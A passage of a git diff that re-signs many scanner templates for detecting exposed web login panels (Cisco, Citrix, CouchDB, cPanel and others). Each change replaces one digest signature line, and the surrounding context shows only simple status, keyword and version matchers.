\ No newline at end of file +# digest: 4a0a00473045022100cc44b6dc1e7032221b90370377049823e74cb924e75a34aef60e683948f23ac602205c7a26bd39aba65c5e73df030a83b1e2cdcb18a07ce60977e725a222545e0e00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml b/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml index 5e56c0a84d..51e3bf4076 100644 --- a/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml +++ b/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml @@ -38,4 +38,4 @@ http: - type: kval kval: - ssl_issuer_dn -# digest: 4a0a0047304502202fe35c96fb944e3d037046c1f09ff2f3ed415c0d970e45d4d773e6cf4ae54524022100e9932ba706b8ed5327ed31e38d683ece8904f976e2d79612340df07051645348:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb217f221528624ecd03776b7e9be729d7737d0205c72623af3f429e39aa15d902203e0c6eda2143fcb1e3a8b302b5023ee07366273cb686ae6948ccf79212902ee4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-onprem-panel.yaml b/http/exposed-panels/cisco/cisco-onprem-panel.yaml index 19e0a2a994..3ed3fcff07 100644 --- a/http/exposed-panels/cisco/cisco-onprem-panel.yaml +++ b/http/exposed-panels/cisco/cisco-onprem-panel.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203057c00283e643fbc48aa34971745f44e59b25748d9898e81ac888515877a1f4022100d22742a5b2b58de31ddd1ab4c6e79570e0c60cc6ba477e0d17d56909855a8708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d4ba901be63f05b33707061c535b48fa1af71a1689a73b0342b6b3624d34704022100ed876148dd7d0c1cd2be57d2a8afec6f281df96e32726a681b687e07bbf07423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml b/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml index aec2c61881..7919fe83f9 100644 --- a/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml +++ b/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml @@ -35,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008ad6993b361c47b5b15364e3e13b83869c41cbec921cc69c8aec538725c3f426022026674bf51fe157886e9aef9d9ab665a764b4aacdf4da186f2a69b13b5559916f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f6a290eafacd7ece924153c694eb47b622fe115f218eaede4f64a87ed3fa2638022056dd83e950366945b634b11fd2ba2ebb86aac24f769a47092c57352d7bfb4a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-sd-wan.yaml b/http/exposed-panels/cisco/cisco-sd-wan.yaml index 55b2fa514c..38fcfa2c41 100644 --- a/http/exposed-panels/cisco/cisco-sd-wan.yaml +++ b/http/exposed-panels/cisco/cisco-sd-wan.yaml @@ -33,4 +33,4 @@ http: words: - "SD-Wan Center" part: body -# digest: 4b0a00483046022100b5598020b62176a072a1888f76b243338668976bde9a71b19cb2bb3e63a88ad00221008244c67860e04c4bdc789a1c3f12d1d974c6faf8c87a4bc78340616bfe48e24d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f5cf709931666e54acf1c8426e6f1f334bb7f86169eb888c8d3503b9146186b1022100fdcc9e4ab734dd9a790717df59328f09ea1b0cfc428806725c2fbb93540a604d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-secure-desktop.yaml b/http/exposed-panels/cisco/cisco-secure-desktop.yaml index ccd059d5bd..3991396191 100644 --- a/http/exposed-panels/cisco/cisco-secure-desktop.yaml +++ b/http/exposed-panels/cisco/cisco-secure-desktop.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e9b6c25596579db910a93a595f0766705b9fbf7457f9ffcb3c24e4bfceef7aad02200cfe225b78a832a61cc701e78ed4299a38dcb9493be8c7bdfbdf6f861247facc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f8b0d9b75386e306804b047c31143bfe91e6b2a5f4b9eba9a17df4990020a25022100fed553feded319634b6757b006f2001562fac279050061c87a602b44ede36fbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-systems-login.yaml b/http/exposed-panels/cisco/cisco-systems-login.yaml index 60e1bdb3c4..2776f74004 100644 --- a/http/exposed-panels/cisco/cisco-systems-login.yaml +++ b/http/exposed-panels/cisco/cisco-systems-login.yaml @@ -35,4 +35,4 @@ http: group: 1 regex: - '<script src="javascript\/translate\.js\?ver=(.+)"><\/script>' -# digest: 490a0046304402200a84131d78c01cb6f069c25998265963460c5f86ef8298d4a32cc467e086bc0602203be6758e0453613e613bb6c24db8428c708970fc33a87cc380ad9f19ce80f084:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aec3c07db99ccd690906e67ae3258e50cb18e208b8bb7855ceeb058a3e01cd4102203dcf9e270a179dcec805bf5264dae705b0e335d4006381690a3471e94d875320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-telepresence.yaml b/http/exposed-panels/cisco/cisco-telepresence.yaml index e8ca2df71e..bdcfe23092 100644 --- a/http/exposed-panels/cisco/cisco-telepresence.yaml +++ b/http/exposed-panels/cisco/cisco-telepresence.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203ee9c2b2d4e7121beb3f8b6b66cbfde2db5682bd937bdd8276072a3cbb4242eb02207779d5640efa3ccb4e4c39363bdccbb5804324587d839beecbdbdd9fb9f01722:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f649be6fea4bce0d982ef8a1d675dd3ae50dc6fb7b1f4ac345cb87a2f1f31c0602210087028f358bef32720c4466aa8ddaa46b7b828f8de5842aa47edfb47bfcfef145:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml b/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml index ecd9d822e1..c575af8ab0 100644 --- a/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml +++ b/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml @@ -37,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f008dcc95f3f2b4e7a348a8aee91b940f39e08cccc32e6fd16f3e7becb30b7cb022100e8d48ecf6642bfe52c79b6933dbaa15c7abf1376a6c3b8dc82bb198d044b8949:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac4752934db0f39c64bedf7049da6d348de50071454b6e6aea0edbf5a64b446e022068e5b3c2b1cc5313780414aca249faa85ca913dbf6ad690d1792677bcf735115:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-vmanage-login.yaml b/http/exposed-panels/cisco/cisco-vmanage-login.yaml index d2d07d5e06..5644f0c5fe 100644 --- a/http/exposed-panels/cisco/cisco-vmanage-login.yaml +++ b/http/exposed-panels/cisco/cisco-vmanage-login.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207bebb700d01a238c77cb7f736992a528d4e48facc9a5e4b50b2987d06d03634f022067419f032c02b827b89a70d898d09e1a1b7513819ec78caf3d1cf63420a40d46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043e23c06eccbbeed91487c48e1c653a79a55aadb9a3449a4def7e50ff02282ff022031d9cf051adb89ef6a2d6571e43ef388130b6562c867f3e9227eb54e84282b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-webvpn-detect.yaml b/http/exposed-panels/cisco/cisco-webvpn-detect.yaml index d5f5f710a5..60677ce338 100644 --- a/http/exposed-panels/cisco/cisco-webvpn-detect.yaml +++ b/http/exposed-panels/cisco/cisco-webvpn-detect.yaml @@ -44,4 +44,4 @@ http: - "webvpncontext=00@.+" - "webvpn=" condition: or -# digest: 4a0a0047304502206522258ba2efd88f6be3f7fb415e8a33a4b57f2b9af95a0bf58190935266954d022100f90e5bf561b6406a06ca4ae661b2df6bac2074717c631ae48fa7bb7356083348:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210088ddeac35157a271b0f1f1595c19a74522fabc615e920ef2cb67b76dff3d392e0221009c980fcc733d03a3128197719aae830f395f20af1b8d6887a05f7ae764bcb0fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/citrix-adc-gateway-detect.yaml b/http/exposed-panels/citrix-adc-gateway-detect.yaml index 08f1b7b8a5..a1df84a7bb 100644 --- a/http/exposed-panels/citrix-adc-gateway-detect.yaml +++ b/http/exposed-panels/citrix-adc-gateway-detect.yaml @@ -28,4 +28,4 @@ http: - type: word words: - '_ctxstxt_CitrixCopyright' -# digest: 490a00463044022063ddb01cf4f07110c8d302799a24ae19298037d92b19763cb5d9b7e7ee85aec102207855ae2252ecb94d8bcea4780631f33e0e8fba98d9d9c253dbe2e0b8fae6552d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100def0df0318116cba761ff082fafa632bb0ac37705b48f62153dd6de1c4606add022022b255fadbaee8f390603a8dbd9773d3a551f359b613e97fbe8df00c482592ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/citrix-vpn-detect.yaml b/http/exposed-panels/citrix-vpn-detect.yaml index 057c563043..aac8a145f2 100644 --- a/http/exposed-panels/citrix-vpn-detect.yaml +++ b/http/exposed-panels/citrix-vpn-detect.yaml @@ -27,4 +27,4 @@ http: - type: word words: - "<title>Citrix Gateway" -# digest: 4a0a00473045022100eca24bbc63720dda57f5b0ec3bbcf734ee30db56bba9f4d638d09a4bac869c3002200cc5abe25e0e58146b81e7d1db4ebb95eed4c4e1a6c8191e825ea3f85abaf64f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dbc5159673e9250ec0ff9ba4ce31a621cc7f91655f45a9a74a9eee5efa9837e402202fbe781620e2abee7da2934422efc71094df3279854bdd7820f4cdd0bb457873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/claris-filemaker-webdirect.yaml b/http/exposed-panels/claris-filemaker-webdirect.yaml index 13d3f8d43b..65fe5a1f0a 100644 --- a/http/exposed-panels/claris-filemaker-webdirect.yaml +++ b/http/exposed-panels/claris-filemaker-webdirect.yaml @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f2954936ee37c4e19172a2d1cfba65e0d842e9e580bab2441484157a9f7428a3022100bdd0f9ea3d432468d731cc63ea1e826fdbac9da931772a647d4bb41719ce3f60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a28f38c6f651c4adf48eaa9de59639b262a8093d93fb8d63f5a88c2436794af6022100a7990af81bd8bb176fb412c3742d39703bc667b4baaf0a13887e67cb4e3e48d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cleanweb-panel.yaml b/http/exposed-panels/cleanweb-panel.yaml index 2b542faa6f..f8ac7c5607 100644 --- a/http/exposed-panels/cleanweb-panel.yaml +++ b/http/exposed-panels/cleanweb-panel.yaml @@ -35,4 +35,4 @@ http: group: 1 regex: - 'title="version\s+([0-9A-Za-z\s\.\-]+)"' -# digest: 4a0a004730450220114dc4ed47106deae44c47007b055ff64c218f65f26df7914b9da73558149951022100c39da350a354b34ab5b287c90314f92e11d7d5b390fc98801f357ebec87d72b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6370e1f7f313940f88f943c9a2b2a16ca6ffe94204c6576665c7390b67b7375022067af3c94b1a2c76e9d86f5173eadb48666a15067c35b01b32332ec482cc1c373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/clearpass-policy-manager.yaml b/http/exposed-panels/clearpass-policy-manager.yaml index bca7f74b0f..12dae627f4 100644 --- a/http/exposed-panels/clearpass-policy-manager.yaml +++ b/http/exposed-panels/clearpass-policy-manager.yaml @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b0c75b38ad6fa5df9e7c5a6361bcdbdf79035abd02dcc4670391bcdb29153917022100a622863e86c6dfa15d251a7e02eac8d4cff8649e185ea96576678b29796b3549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002123f882d035f9248c882d17dd9bcf5e3b95610b1e94cbc695adaf43e245b10022100b67deae395544476190a7c1e2badf54c84d6ad5fc01783ee5ad0f0196ce772ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cloudpanel-login.yaml b/http/exposed-panels/cloudpanel-login.yaml index 4bc6245370..a3d2b77ad6 100644 --- a/http/exposed-panels/cloudpanel-login.yaml +++ b/http/exposed-panels/cloudpanel-login.yaml @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022060a3136030bfe7b24fb4a98d876903444b39b2d033cd9b30500bd27cdef03aa002207613e3015c673150720cc52c61bfc344c7e5a517185b641015625457117cd702:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac430a81f6d239acf9da9fc2ae7ff9378320ffe313d57e3eda6c162ed7425d6f022100ee3f2ee02acb997e5580b668fbfc9781346bf2681fe872e3ac0ff54f1c3b1f01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cobbler-webgui.yaml b/http/exposed-panels/cobbler-webgui.yaml index 4f58e2981e..9cb2b66822 100644 --- a/http/exposed-panels/cobbler-webgui.yaml +++ b/http/exposed-panels/cobbler-webgui.yaml @@ -41,4 +41,4 @@ http: - "/cobbler_webui_content/" - "/cobbler_web/do_login" condition: or -# digest: 4a0a0047304502203cd78eb6703e6c7390e11df6d6e0b0c727118ae2489baf37d35da024d8b0275302210093961a9b3d49a30138b10a306d392d10d30ea3be2b76f6e0f53b390e1b94d0b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ea4ce96042cfa7d9841504d0e5d321c872b9ddb1590f6e2a2f671220ef29a95b022100e804961dbfcaea003ac2470b58f7777f2e345c3f403c725a23adca9f237b75d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/code-server-login.yaml b/http/exposed-panels/code-server-login.yaml index 5f480a786b..f5a1ad8a7a 100644 --- a/http/exposed-panels/code-server-login.yaml +++ b/http/exposed-panels/code-server-login.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f3d36874f463be42f58a4b29e186f8f55eceaa9361540e3abf10be3b5eb72ea10220335ce5cb2ecf89ba71e2a2a7e27c3bc699d2adb478f03e1539211d023118ee07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c7ec8d06e7912dde206331a183e86af24fe4ebeff8a386a6b8e1e37b4aed819b0220112d114f12f92d909283bb5b7e3b8226c8502f446c42539a28e1b2a47d3b686c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/code42-panel.yaml b/http/exposed-panels/code42-panel.yaml index 41dd702fae..eae66ee54f 100644 --- a/http/exposed-panels/code42-panel.yaml +++ b/http/exposed-panels/code42-panel.yaml @@ -29,4 +29,4 @@ http: - type: word words: - "Code42 homepage" -# digest: 490a0046304402203e8b1a2a09bde04f0aa4286d3ff6839ec46cd22b14534f7324821785fc0c15ad02206d7911ddef51d3d2db5dff9d7e15e09fce73602caff4653bd8d9c7ed68154969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022044fd6e1168b38dd772b3984319888a6d9b42fb4ba13c421e7688e7fadafdadde0220544863e0a3ceff2657d6e73f7bfefc752a76beacebe056cdcf4c91c0c36e9554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/codemeter-webadmin-panel.yaml b/http/exposed-panels/codemeter-webadmin-panel.yaml index eac42fd9b3..dd7aa6c1d9 100644 --- a/http/exposed-panels/codemeter-webadmin-panel.yaml +++ b/http/exposed-panels/codemeter-webadmin-panel.yaml @@ -31,4 +31,4 @@ http: status: - 301 - 302 -# digest: 4a0a00473045022100c534a8256d713b49b38c60b041ef1ad8551c8c24b20d219db28f0ac44b8f687e022048db3e1b43f2ac27d9f5bea69ffe5e6389fceeead8670c65b89bfd5a9837946a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a4354467f88c28a93131dd9d4acef71229ae68442f540f55a046fdd9dc5743ef022100f915d1f83edbfc505eb8636577ad78ff20d8e7ea8f0bc08ae9c76f0aacc388e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/coldfusion-administrator-login.yaml b/http/exposed-panels/coldfusion-administrator-login.yaml index 1d7e86dff6..1c916ff2db 100644 --- a/http/exposed-panels/coldfusion-administrator-login.yaml +++ b/http/exposed-panels/coldfusion-administrator-login.yaml @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022071f1807b59a40888c4beed7eee2f23e982330fdf510db2152c8d115977f81074022100d062ed5f0ad8278d3e7809b6347ac4a5072f0b3015e394a21b567483cfdde3d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e90d4d2afd339ab50370a9a0f3f07c7cfa80b6a388c6227cbe40df2ffcc2145302203461f75bc5f90f436bc602113c2cd524e4b9020b3a8848c31e1bcb432b5d7da3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/compal-panel.yaml b/http/exposed-panels/compal-panel.yaml index ac6443303b..2756dbf201 100644 --- a/http/exposed-panels/compal-panel.yaml +++ b/http/exposed-panels/compal-panel.yaml @@ -25,4 +25,4 @@ http: words: - "" part: body -# digest: 4b0a00483046022100e38958d3171e1b253e73fc9f13cc7b630669e5cd9e143afd61996de78258c10b0221008c0cdc84617c8f95af4977df346e715002b08dd58819cce889d534571b4ec68f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ddb8ae4a8c3e2e235a729a7796721810b1f6ce55ce9d76a8456c25a5a76dae15022015e1a01492ad8228d131fe0f853ccd2270020474914f99523c8bf45d88c6d031:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/compalex-panel-detect.yaml b/http/exposed-panels/compalex-panel-detect.yaml index 6cbfc8bf64..5c456f1327 100644 --- a/http/exposed-panels/compalex-panel-detect.yaml +++ b/http/exposed-panels/compalex-panel-detect.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203f2d7f7f9157a8d2a5620417f2493ade6413463d3c7fa5572647119700b52256022100cb2d468e2a5c7503f3936717e454be526b55a0d9f89b7fc776ec8be8bb2efe80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b4df4c351195049490e6da75397200640f1dfe082708202d08a32f2a07b67a8022100dd03d23778bc40314fb8a97094018657658f9095d0a0aff27ec090b74bf3f0b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/completeview-web-panel.yaml b/http/exposed-panels/completeview-web-panel.yaml index 410ae4f957..3db0ad6654 100644 --- a/http/exposed-panels/completeview-web-panel.yaml +++ b/http/exposed-panels/completeview-web-panel.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100feb9cbaa761cc04362af2cdd9ceec51bcb43335a650fd4bcab5f1b0c88a29d7a02201176ce5a2923dca2715e958f17bae8b3cddea53f1c80c96bc397c1e7a23f3ff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047bd2855216d80c01d4bc14878c0a209d48403c77b492adca3cf7031f2e598e00220205581ce7af9aea98a6251c410dd1707d074b3423be851b5fe876973d39647f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/concrete5/concrete5-install.yaml b/http/exposed-panels/concrete5/concrete5-install.yaml index 97aa30678f..9c909d66bf 100644 --- a/http/exposed-panels/concrete5/concrete5-install.yaml +++ b/http/exposed-panels/concrete5/concrete5-install.yaml @@ -52,4 +52,4 @@ http: group: 1 regex: - 'Version ([0-9.]+)' -# digest: 4b0a00483046022100b4df532a2b280cc7d125c47b9f4156f64c2bb6b1b4e8980b1850a97db58e08d2022100e43c6b56c6fd28fe33a721af0edb1783a666381d6ba6bdb1ed1da471960d42b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c18ee89e6afa2c4ad9207b8b392d54e5195583ea8cc432835806ac64951d7f80220038802a551ff843567b891adf4bf883c952d8fbc1b6835ffb8f34e7ff63fb1c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/concrete5/concrete5-panel.yaml b/http/exposed-panels/concrete5/concrete5-panel.yaml index 96681f8cf5..25aca98066 100644 --- a/http/exposed-panels/concrete5/concrete5-panel.yaml +++ b/http/exposed-panels/concrete5/concrete5-panel.yaml @@ -47,4 +47,4 @@ http: regex: - 'content="concrete5 \- ([0-9.]+)"\/>' - 'Version ([0-9.]+)' -# digest: 4a0a00473045022100a76480260f82e5ab0418499d4fb84da861ffb38cec4d0d87c4f2c67b4eff6678022007813f04b3a486db718b43c78d917f588fd1f953cd53405c0aeaa0c4259de347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015f25608530b602648424e78a0d3a60177f9c57e3b3e4f3ce19f84b9f5aaee7502200d944eb9830b84d2f6c8355c7714045228128b299015df2065e5a543a5c7aabc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/connect-box-login.yaml b/http/exposed-panels/connect-box-login.yaml index 1fdc18be74..dec7122dc5 100644 --- a/http/exposed-panels/connect-box-login.yaml +++ b/http/exposed-panels/connect-box-login.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 302 -# digest: 490a00463044022029aadecea6f4ca60ecf6a2f953fea97328f04d2b8610556f5edb7a3a14d15ef502205ece5ab52fc0172cb76bd33cb293699739fdce7bc6853e896e5855ceff45d321:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201bec0d69e021aa6ba6dba346463363fb94a5581787b2ac873132a6ef7d8c1a0902210092803f238ae9834750d0a70a94520fbfa592c0c64db28ccb809aace9ec81a867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/connectwise-backup-manager.yaml b/http/exposed-panels/connectwise-backup-manager.yaml index f4a62d7ed8..1ee2798988 100644 --- a/http/exposed-panels/connectwise-backup-manager.yaml +++ b/http/exposed-panels/connectwise-backup-manager.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206b7bfc9449f8dba8dfb74a3aa61531fb6949965541e5635f8270fe1a4885c2c20220187866d9db113f5100cbc6bded4ec7144e986263b1eb968647d8e3dd43f065a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fbb268f013f3e3a66f950b36278457374d4cf8136385a45b03143a3735d3600102204261e0b9295d08e6431426adcbe871c71e3213cc0d240004a6f58c9372b39867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/connectwise-panel.yaml b/http/exposed-panels/connectwise-panel.yaml index ddce3e539e..a6ef9ca985 100644 --- a/http/exposed-panels/connectwise-panel.yaml +++ b/http/exposed-panels/connectwise-panel.yaml @@ -46,4 +46,4 @@ http: part: header kval: - Server -# digest: 4b0a00483046022100d05ba36a428857eabed768cdf6b953c8b3e6f13d09e8b282c2383b3fddd0dc3f022100f136fcfb37ac3fd1a6bd8ce87a25b7dac333faf61242945688c86d0ce0db70cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e90dd8f92b0151ef50ffbc4363e068e5e33275c3a4a645c26269eb660a85f635022064a31e9ffdd798bf5d23c109e2238a32a1e8b25b619618e491724e153b8c3ec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/contao-login-panel.yaml b/http/exposed-panels/contao-login-panel.yaml index d4bdf0992a..cb2cff458d 100644 --- a/http/exposed-panels/contao-login-panel.yaml +++ b/http/exposed-panels/contao-login-panel.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022013599876e24c999635966d9824b931552d3d65242bc11bec539865651a6680a302201b4a48d65bec98cec8ee1037b2ed65f4c82a8398eed06d6405a756c90dfb453e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ece3f3b3a0e419eebb6942ac252d990a5016eb2df60d7087d80588bd1726a414022000fe6c7f3b5f2ac99a5503097fc4cd61e58fc5c0974dbf723a2c3b7860754376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/content-central-login.yaml b/http/exposed-panels/content-central-login.yaml index 97f57e01af..f637709506 100644 --- a/http/exposed-panels/content-central-login.yaml +++ b/http/exposed-panels/content-central-login.yaml @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201aeb0201b23c1d3893eede7387314055996ef0d195bd877f8e0d3fe32b26c85e0220617523d27eb0f13bb57e2ca9ec742ad5134f423172b26bc4f4e5d5c2e08965fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b48f99fac41e5b85eca89bba811a865f7d7bf8a61a2df1c2cf67601541489c26022100d3b24d415e9a28366cedad00509aa88d26ad57e6ad9d0611f565cc93b6f9a001:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/corebos-panel.yaml b/http/exposed-panels/corebos-panel.yaml index 0618a9da35..97c47ee8cd 100644 --- a/http/exposed-panels/corebos-panel.yaml +++ b/http/exposed-panels/corebos-panel.yaml @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204d65eece451a675cc7b41015e41f30a28358f3f23bb9deed0a323f019c26f18e02207246f8e0416a2c536637eedf70e9538132f8920027637f9b1e249081e68ff5c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d1f80722bfab8e706991c3616e6517f7b06fc4f33781c104339395a964e9e26a022100ae542549aaa3038330125ca80c5a80fcb0836beee923a28d6b72f399f485d844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cortex-xsoar-login.yaml b/http/exposed-panels/cortex-xsoar-login.yaml index 5cce94feaf..36e561e3bf 100644 --- a/http/exposed-panels/cortex-xsoar-login.yaml +++ b/http/exposed-panels/cortex-xsoar-login.yaml @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220306b38d3da33a32702c4d4b615b4ddabe5da9396b4932d72d5a9bc1bb787e5b1022100ce07548fbbafa373de1322913de297ff1bdc7584d048790a7a7625244ba55996:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c108dc7a3c7fe10e64a8cd6cf43c3414155f2d3414d8344ad8d694c990ff9dca0221009496f2ecce46901ac1f3572c0eddda0b9557a954fa197e10903649ce66f56273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/couchdb-exposure.yaml b/http/exposed-panels/couchdb-exposure.yaml index 145b7e32bb..3db495f53d 100644 --- a/http/exposed-panels/couchdb-exposure.yaml +++ b/http/exposed-panels/couchdb-exposure.yaml @@ -35,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202460dc58be10e57f100b410c936566550b450b09ba63c9bae5f1d4154febff0d022100933ab91c370c6a865a941d02ada1ad45639d3eb05571de02ffeb974402aae792:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210091857b85d26f6ab315ab04c37d810bf62c13b774f8f249271efec759d89fec190221009aa1d9bdf6bed5ea38631ecefd32d2b4eefe6f6fe2bfe28c5d1300799c90d9c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/couchdb-fauxton.yaml b/http/exposed-panels/couchdb-fauxton.yaml index d31a9d556c..c58e076233 100644 --- a/http/exposed-panels/couchdb-fauxton.yaml +++ b/http/exposed-panels/couchdb-fauxton.yaml @@ -27,4 +27,4 @@ http: - type: word words: - 'Project Fauxton' -# digest: 490a0046304402202cbaa7f07838499e65f8c672fff2e7622914e0d9e01b3d0e56640a35a4be956802201c33a3272ca122356d5063a95156dd7510eceaae7d635e428e7b22ad310d908e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022056788110767aed1cc3b6d38e77e30a8fd0f120a53102503ff652d0ef72f300ff022003950d2da110500224fda4622da4286e43a9d55453f8fa9ddbfdb5ad65bbce70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cpanel-api-codes.yaml b/http/exposed-panels/cpanel-api-codes.yaml index 53f2ce9e01..6acaf492fa 100644 --- a/http/exposed-panels/cpanel-api-codes.yaml +++ b/http/exposed-panels/cpanel-api-codes.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 